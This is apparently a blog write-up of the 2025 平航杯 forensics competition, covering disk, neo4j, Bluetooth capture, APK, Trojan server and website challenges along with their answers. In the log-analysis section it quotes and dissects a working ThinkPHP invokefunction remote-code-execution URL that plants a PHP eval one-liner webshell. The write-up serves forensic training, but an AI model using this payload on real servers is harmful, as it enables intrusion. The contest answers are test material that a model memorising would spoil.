2025平航

计算机

6,分析起早王的计算机检材,起早王开始写日记的时间(格式:2020/1/1)
assets/2025平航/file-20260319222410328.png
分析起早王的计算机检材,SillyTavern中账户起早王的创建时间是什么时候(格式:2020/1/1 01:01:01)
assets/2025平航/file-20260319223542044.png
assets/2025平航/file-20260319223406652.png
分析起早王的计算机检材,SillyTavern中起早王用户下的聊天ai里有几个角色(格式:1)
同上
assets/2025平航/file-20260319223944409.png
9,分析起早王的计算机检材,SillyTavern中起早王与ai女友聊天所调用的语言模型(带文件后缀)(格式:xxxxx-xxxxxxx.xxxx)
日志文件里有
assets/2025平航/file-20260319224555376.png
assets/2025平航/file-20260319224927960.png
Tifa-DeepsexV2-7b-Cot-0222-Q8.gguf
assets/2025平航/file-20260319230230185.png
assets/2025平航/file-20260319230533833.png
分析起早王的计算机检材,neo4j中数据存放的数据库的名称是什么(格式:abd.ef)
assets/2025平航/file-20260321161429209.png
assets/2025平航/file-20260321161506574.png
14,分析起早王的计算机检材,neo4j数据库中总共存放了多少个节点(格式:1)
assets/2025平航/file-20260321163354720.pngassets/2025平航/file-20260321164018203.png
成功了!!!assets/2025平航/file-20260321164509528.png
正规途径在E的学习笔记里面有xmind里面有记录
assets/2025平航/file-20260321165512488.png
15,分析起早王的计算机检材,neo4j数据库内白杰的手机号码是什么(格式:12345678901)
没找到,问ai,搜到了
assets/2025平航/file-20260321170124633.png
16,分析起早王的计算机检材,分析neo4j数据库内数据,统计在2025年4月7日至13日期间使用非授权设备登录且登录地点超出其注册时登记的两个以上城市的用户数量(格式:1)

MATCH (u:User)-[:HAS_LOGIN]->(l:Login)-[:FROM_IP]->(ip:IP)
MATCH (l)-[:USING_DEVICE]->(d:Device)
WHERE l.time < datetime('2025-04-14')
  AND ip.city <> u.reg_city
  AND NOT (u)-[:TRUSTS]->(d)
WITH u,
     collect(DISTINCT ip.city) AS 异常登录城市列表,
     collect(DISTINCT d.device_id) AS 未授权设备列表,
     count(l) AS 异常登录次数
WHERE size(异常登录城市列表) > 2
RETURN u.user_id AS 用户ID,
       u.real_name AS 姓名,
       异常登录城市列表,
       未授权设备列表,
       异常登录次数
ORDER BY 异常登录次数 DESC;

assets/2025平航/file-20260321194248091.png
分析起早王的计算机检材,起早王的虚拟货币钱包的助记词的第8个是什么(格式:abandon)
assets/2025平航/file-20260319222652726.png
assets/2025平航/file-20260321195423132.png
assets/2025平航/file-20260321195440682.png
分析起早王的计算机检材,起早王的虚拟货币钱包是什么(格式:0x11111111)
assets/2025平航/file-20260321200711059.png
assets/2025平航/file-20260321202531301.png
assets/2025平航/file-20260321202857786.png
assets/2025平航/file-20260321221814004.png

流量分析

请问侦查人员是用哪个接口进行抓到蓝牙数据包的(格式:DVI1-2.1)
assets/2025平航/file-20260321224726089.png
起早王有一个用于伪装成倩倩耳机的蓝牙设备,该设备的原始设备名称为什么(格式:XXX_xxx 具体大小写按照原始内容)
assets/2025平航/file-20260323083031499.png

D:\quzheng\Wireshark\tshark.exe -r A:\BLE.pcapng -T json >BLE.json

assets/2025平航/file-20260323085328116.png
assets/2025平航/file-20260323083006789.png
起早王有一个用于伪装成倩倩耳机的蓝牙设备,该设备修改成耳机前后的大写MAC地址分别为多少(格式:32位小写md5(原MAC地址_修改后的MAC地址) ,例如md5(11:22:33:44:55:66_77:88:99:AA:BB:CC)=a29ca3983de0bdd739c97d1ce072a392 )
80:E1:26:33:32:31_52:00:52:10:13:14→97d79a5f219e6231f7456d307c8cac68
assets/2025平航/file-20260323083006789.png
assets/2025平航/file-20260323092235201.png
流量包中首次捕获到该伪装设备修改自身名称的UTC+0时间为?(格式:2024/03/07 01:02:03.123)
assets/2025平航/file-20260323094943191.png
注意答案是 UTC+0
所以要减8小时,是下边的那一条记录
起早王中途还不断尝试使用自己的手机向倩倩电脑进行广播发包,请你找出起早王手机蓝牙的制造商数据(格式:0x0102030405060708)
刚刚一共就仨设备名
Cracked
Flipper 123all
QQ_WF_SP8OON
最后那个Cracked就是他手机
assets/2025平航/file-20260325141138214.png
起早王的真名是什么(格式:Cai_Xu_Kun 每个首字母均需大写 )
ctf-neta直接分析
assets/2025平航/file-20260325170617598.png

cap大写锁定
space空格
del删除
ret回车、

[手机取证](2025平航杯 wp | Meteor_Kai)

分析倩倩的手机检材,手机内Puzzle_Game拼图程序拼图APK中的Flag1是什么(格式:xxxxxxxxx)
我们反编译一下Puzzle_Game看看,发现有个flagactivity。

image-20250425222923272

关键点在于此处的String flag = AESUtil.decryptFlag();

跟进decryptFlag方法。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
public static String decryptFlag() {
int lastByte;
int resultLength;
try {
mInvocationCount++;
byte[] keyBytes = generateWhiteBoxKey();
byte[] cipherBytes = assembleCipherText();
if (mInvocationCount % 3 == 0) {
Thread.sleep(new Random().nextInt(100));
}
byte[] expanded = expandKey(keyBytes);
byte[] decrypted = decryptAESBlock(cipherBytes, expanded);
if (decrypted != null && decrypted.length > 0 && (lastByte = decrypted[decrypted.length - 1] & 255) > 0 && lastByte <= 16 && (resultLength = decrypted.length - lastByte) >= 0 && resultLength <= decrypted.length) {
byte[] result = new byte[resultLength];
System.arraycopy(decrypted, 0, result, 0, resultLength);
return new String(result, StandardCharsets.UTF_8);
} else if (decrypted != null) {
return new String(decrypted, StandardCharsets.UTF_8);
} else {
return "解密失败: 结果为空";
}
} catch (Exception e) {
e.printStackTrace();
return "解密失败: " + e.getMessage();
}
}

生成密钥的逻辑主要如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
private static byte[] generateWhiteBoxKey() {
byte[] keyBytes = new byte[MAGIC_NUMBERS.length];
int i = 0;
while (true) {
byte[] bArr = MAGIC_NUMBERS;
if (i < bArr.length) {
keyBytes[i] = (byte) (bArr[i] ^ 6);
i++;
} else {
return keyBytes;
}
}
}

那个expandkey函数不用管,其实就是AES(高级加密标准)的密钥扩展(Key Expansion)算法实现,用于将输入的初始密钥(通常为 16 字节)扩展为一个更长的轮密钥(176 字节,对应 AES-128 的 11 轮加密所需的子密钥)。

首先获取一下key

image-20250425223516381

1 weZl_d0wn_sbwyz_

然后我们找密文。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
private static byte[] hexStringToByteArray(String s) {
if (s.length() % 2 != 0) {
s = "0" + s;
}
int len = s.length();
byte[] data = new byte[len / 2];
for (int i = 0; i < len; i += 2) {
try {
int high = Character.digit(s.charAt(i), 16);
int low = Character.digit(s.charAt(i + 1), 16);
if (high == -1 | low == -1) {
throw new IllegalArgumentException("无效的十六进制字符");
}
data[i / 2] = (byte) ((high << 4) | low);
} catch (Exception e) {
return new byte[]{80, -52, 4, 49, 53, 6, Byte.MIN_VALUE, -61, 10, 94, -59, 25, 82, 115, 109, 12};
}
}
return data;
}
1 80, -52, 4, 49, 53, 6, -128, -61, 10, 94, -59, 25, 82, 115, 109, 12

image-20250425224225544

1 Key_1n_the_P1c

[AES算法流程](什么是AES加密?详解AES加密算法原理流程 - 知乎)

AES加密算法涉及4种操作:字节替代(SubBytes)、行移位(ShiftRows)、列混淆(MixColumns)和轮密钥加(AddRoundKey)。下图给出了AES加解密的流程,从图中可以看出:
1、解密算法的每一步分别对应加密算法的逆操作;
2、加解密所有操作的顺序正好是相反的。正是由于这几点(再加上加密算法与解密算法每步的操作互逆)保证了算法的正确性。加解密中每轮的密钥分别由种子密钥经过密钥扩展算法得到。算法中16字节的明文、密文和轮子密钥都以一个4x4的矩阵表示
assets/2025平航/file-20260328224436483.png
AddRoundKey (轮密钥加)— 矩阵中的每一个字节都与该次轮密钥(round key)做XOR运算;每个子密钥由密钥生成方案产生。
SubBytes(字节替代) — 通过非线性的替换函数,用查找表的方式把每个字节替换成对应的字节。
ShiftRows(行移位) — 将矩阵中的每个横列进行循环式移位。
MixColumns (列混淆)— 为了充分混合矩阵中各个直行的操作。这个步骤使用线性转换来混合每列的四个字节。
以上为AES在加密中的大致流程。
分析手机内Puzzle_Game拼图程序,请问最终拼成功的图片是哪所大学(格式:浙江大学)
解压APK,发现图片
assets/2025平航/file-20260328230711060.jpg
手机识图得到浙江中医药大学

服务器

分析起早王的服务器检材,Trojan服务器混淆流量所使用的域名是什么(格式:xxx.xxx)
assets/2025平航/file-20260328233731532.png
分析起早王的服务器检材,Trojan服务运行的模式为:A、foward B、nat C、server D、client
assets/2025平航/file-20260329103352236.png
由于config.json(实际运行的配置)与nat.json-example(运行模式为nat)的内容一致,因此Trojan服务的运行模式为 nat(选项B)。

网站重构(不是同天弄的,所以域名会不同)

bt default启动
bt 5 重置密码,比较方便登录

http://192.168.100.3:8888/0d85fe0b

assets/2025平航/file-20260405161207216.png
assets/2025平航/file-20260405161359396.png

宝塔面板(BT Panel)中的 phpMyAdmin 是一个 基于 Web 的 MySQL/MariaDB 数据库管理工具

phpMyAdmin 是什么?
phpMyAdmin 是一个用 PHP 编写的免费开源工具,用于通过 Web 浏览器管理 MySQL 和 MariaDB 数据库。
在宝塔面板中的作用

  1. 数据库可视化管理
    • 创建/删除数据库
    • 创建/修改/删除数据表
    • 执行 SQL 查询
    • 导入/导出数据库
  2. 用户权限管理
    • 管理数据库用户
    • 设置用户权限
    • 修改用户密码
  3. 数据操作
    • 浏览、编辑、删除数据
    • 搜索数据
    • 批量操作数据

assets/2025平航/file-20260406105816669.png
assets/2025平航/file-20260406105838842.png
加入左上角的域名就能连上了
assets/2025平航/file-20260406155331095.png
分析网站后台登录密码的加密逻辑,给出密码sbwyz1加密后存在数据库中的值【格式:1a2b3c4d】
assets/2025平航/file-20260406162736322.png

assets/2025平航/file-20260406160829291.png

密钥(AUTH_CODE)的位置

在 TPSHOP/ThinkPHP 系统中,AUTH_CODE通常定义在:

  1. application/config.php
// 应用调试模式
'app_debug'              => false,
// 应用Trace
'app_trace'              => false,
// 应用模式状态
'app_status'             => '',
// 是否支持多模块
'app_multi_module'       => true,
// 入口自动绑定模块
'auto_bind_module'       => false,
// 注册的根命名空间
'root_namespace'         => [],
// 扩展函数文件
'extra_file_list'        => [THINK_PATH . 'helper' . EXT],
// 默认输出类型
'default_return_type'    => 'html',
// 默认AJAX 数据返回格式,可选json xml ...
'default_ajax_return'    => 'json',
// 默认JSONP格式返回的处理方法
'default_jsonp_handler'  => 'jsonpReturn',
// 默认JSONP处理方法
'var_jsonp_handler'      => 'callback',
// 默认时区
'default_timezone'       => 'PRC',
// 是否开启多语言
'lang_switch_on'         => false,
// 默认全局过滤方法 用逗号分隔多个
'default_filter'         => '',
// 默认语言
'default_lang'           => 'zh-cn',

// 加密key
'AUTH_CODE'              => 'TPSHOP',  // ← 这里!通常是一个自定义字符串
  1. 或者可能在 application/database.php,与数据库配置在一起
  2. 也可能是独立配置文件,如 application/extra/common.php
    assets/2025平航/file-20260406161025925.png
    assets/2025平航/file-20260406163439348.png
    网站后台显示的服务器GD版本是多少(格式:1.1.1 abc)
    因为我们能接触到这个数据库后台,因此我们其实可以直接改密码,这个密码当然和填进去的不一样,但是因为第七题我们已经得到了sbwyz1的后台存储格式为f8537858eb0eabada34e7021d19974ea
    因此我们直接改后台admin的password为这个
    assets/2025平航/file-20260406164518913.png
    assets/2025平航/file-20260406165141647.png
    在网站购物满多少免运费(格式:1)
    assets/2025平航/file-20260406170144111.png
分析网站日志,成功在网站后台上传木马的攻击者IP是多少【格式:1.1.1.1】

锁定peiqi.php
这是一个典型的ThinkPHP远程代码执行漏洞攻击!攻击者试图在您的服务器上写入一个木马后门文件。让我详细解析这个攻击:

攻击解析

  1. 攻击URL结构
/?s=/admin/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][]=<?php%20@eval($_POST[%27peiqi%27])?>
  1. 攻击解码分析
  • \x5C是反斜杠 ``的URL编码
  • 实际路径:/admin/\think\app/invokefunction
  • 这是ThinkPHP框架的一个漏洞利用路径
  1. 攻击参数分解
参数 含义 攻击意图
function=call_user_func_array PHP函数调用 动态执行PHP函数
vars[0]=file_put_contents 要调用的函数 文件写入函数
vars[1][]=peiqi.php 第一个参数 要创建的文件名
vars[1][]=<?php @eval($_POST['peiqi'])?> 第二个参数 写入的木马内容
  1. 木马代码解析
<?php @eval($_POST['peiqi'])?>
  • @:错误抑制符,隐藏错误
  • eval():执行任意PHP代码
  • $_POST['peiqi']:通过POST参数peiqi接收代码
  • 功能:这个木马允许攻击者通过POST请求执行任意PHP命令
  1. 攻击者信息
  • IP:222.2.2.2
  • User-AgentJava/11.0.13
    • 这是伪造的User-Agent
    • 实际是自动化攻击工具
  • 时间:2022-03-04 15:15:13
攻击者插入的一句话木马文件的sha256值是多少【格式:大写sha256】

锁定peiqi.php

攻击者使用工具对内网进行扫描后,rdp扫描结果中的账号密码是什么【格式:abc:def】

assets/2025平航/file-20260406201012892.png
assets/2025平航/file-20260406201043080.png
assets/2025平航/file-20260406201104324.png
对于每个用户,计算其注册时间【用户表中的注册时间戳】到首次下单时间【订单表中最早时间戳】的间隔,找出间隔最短的用户id。【格式:1】
assets/2025平航/file-20260406172437837.png
assets/2025平航/file-20260406172616188.png

举例说明

假设用户 A10012026-01-01 10:00:00注册。

  • 他于 2026-01-01 10:05:00下了一笔订单(tp_order.add_time)。
  • 商家在 2026-01-02 14:00:00打包发货并生成发货单(tp_delivery_doc.create_time)。
    那么:
  • 语句1​ 会计算出 A1001的时间差为 5分钟
  • 语句2​ 会计算出 A1001的时间差为 1天零4小时
    所以感觉第一个更好一点
    统计每月订单数量,找出订单最多的月份【XXXX年XX月】
SELECT  
EXTRACT(YEAR FROM FROM_UNIXTIME(o.create_time)) as year,  
EXTRACT(MONTH FROM FROM_UNIXTIME(o.create_time)) as month,  
COUNT(*) as order_count  
FROM tp_delivery_doc o  
GROUP BY year, month  
ORDER BY order_count DESC  
LIMIT 1;

找出连续三天内下单的用户并统计总共有多少个【格式:1】
assets/2025平航/file-20260406171509808.png

AI

22、分析crack文件,获得flag1(格式:flag1{123456})

23、分析crack文件,获得flag2(格式:flag2{123456})
24.分析crack文件,获得flag3(格式:flag3{123456})

25分析crack文件,获得flag4(格式:flag4{123456})

posted @ 2026-03-29 10:36  Nu0  阅读(38)  评论(0)    收藏  举报